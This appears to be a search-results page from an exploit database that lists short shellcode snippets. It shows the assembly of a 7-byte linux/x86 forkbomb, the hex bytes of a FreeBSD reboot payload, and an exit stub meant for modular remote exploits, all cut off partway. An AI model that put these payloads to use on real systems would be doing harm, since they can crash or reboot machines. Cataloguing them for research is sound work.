5 matches found
EUVD-2017-18434
Malware in sbrugna...
linux/x86 forkbomb 7 bytes
Exploit for linux/x86 platform in category shellcode ========================== linux/x86 forkbomb 7 bytes ========================== / By Kris Katterjohn 8/29/2006 7 byte shellcode for a forkbomb section .text global start start: push byte 2 pop eax int 0x80 jmp short start / main char shellcode...
freebsd/x86 reboot(RB_AUTOBOOT) Shellcode 7 bytes
Exploit for freebsd/x86 platform in category shellcode ================================================= freebsd/x86 rebootRBAUTOBOOT Shellcode 7 bytes ================================================= / FreeBSDx86-reboot-7b.c Shellcode, rebootRBAUTOBOOT, 7 bytes by IZ / char shellcode = "\x31\xc...
freebsd/x86 reboot(RB_AUTOBOOT) Shellcode 7 bytes
No description provided by source. / FreeBSDx86-reboot-7b.c Shellcode, rebootRBAUTOBOOT, 7 bytes by IZ guerrilla.sytes.net / char shellcode = "\x31\xc0" / xor %eax,%eax / "\x50" / push %eax / "\xb0\x37" / mov $0x37,%al / "\xcd\x80"; / int $0x80 / void main int ret; ret = int &ret + 2; printf"len...
linux/x86 _exit(1); 7 bytes
Exploit for linux/x86 platform in category shellcode =========================== linux/x86 exit1; 7 bytes =========================== / exit-core.c by Charles Stevenson I made this as a chunk you can paste in to make modular remote exploits. I use it when I need a process to exit cleanly. / char...